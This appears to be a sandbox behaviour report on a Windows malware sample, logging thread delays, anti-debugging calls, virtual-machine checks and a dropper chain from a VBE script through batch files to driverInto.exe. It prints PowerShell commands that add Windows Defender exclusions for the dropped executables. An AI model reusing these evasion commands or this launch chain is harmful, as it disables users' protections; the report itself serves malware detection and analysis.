Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,		0_2_0101C220

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0101E6A3 VirtualQuery,GetSystemInfo,

0_2_0101E6A3

Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599516	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 599406	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99874	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99656	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99546	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99437	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99327	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99218	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 99000	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98890	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98781	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98672	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98562	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98453	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98343	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98234	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98125	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 98015	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 597282	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 596926	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 594834	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 30000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599843
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599705
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599281
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 599000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 3600000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 598047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 596172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 595234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594859
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594515
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594319
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 594140
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 593832
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 593523
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 589297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 589047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 588625
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 588265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587593
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 587000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 586656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 586172
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585949
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585687
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585437
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 585062
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 584780
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 584297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583968
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583656
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 583312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 582234
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581922
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581730
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581591
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581390
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581218
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 581018
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 579265
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 579047
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 300000
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578875
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578312
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 578130
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577984
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577872
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577748
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577621
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577449
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577328
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577156
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 577017
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576863
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576462
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 576353
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 574718
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 574359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573713
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573578
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573450
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573338
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573230
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573125
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 573015
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572905
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572794
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572650
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572546
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572421
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572297
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572179
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 572019
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571890
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571781
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 571587
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 570031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569697
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569318
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 569031
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568906
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568788
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568686
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568577
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568466
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568359
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Thread delayed: delay time: 568250

Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\portintosvc\driverInto.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: driverInto.exe, 00000004.00000002.1978002789.000000001B88F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll >

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

API call chain: ExitProcess graph end node

graph_0-23962

Source: C:\portintosvc\driverInto.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0101F838

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_01027DEE mov eax, dword ptr fs:[00000030h]

0_2_01027DEE

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_0102C030 GetProcessHeap,

0_2_0102C030

Source: C:\portintosvc\driverInto.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101F9D5 SetUnhandledExceptionFilter,	0_2_0101F9D5
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0101F838
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_0101FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0101FBCA
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Code function: 0_2_01028EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_01028EBD

Source: C:\portintosvc\driverInto.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'	Jump to behavior

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\portintosvc\X5ZTZfC.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\portintosvc\6iyrEfS0qZMUeKUvqyCENK8F6bD2a9LOXf0Mm.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\portintosvc\driverInto.exe "C:\portintosvc/driverInto.exe"	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\services.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Registration\csrss.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\portintosvc\driverInto.exe'	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\28moAYly7n.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe "C:\Users\Default User\My Documents\My Pictures\XXPWErhsUbDrk.exe"

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: 0_2_01010723 cpuid

0_2_01010723

Source: C:\Users\user\Desktop\Vqzx4PFehn.exe

Code function: GetLocaleInfoW,GetNumberFormatW,

0_2_0101AF0F

Source: C:\portintosvc\driverInto.exe	Queries volume information: C:\portintosvc\driverInto.exe VolumeInformation	Jump to behavior
Source: C:\portintosvc\driverInto.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
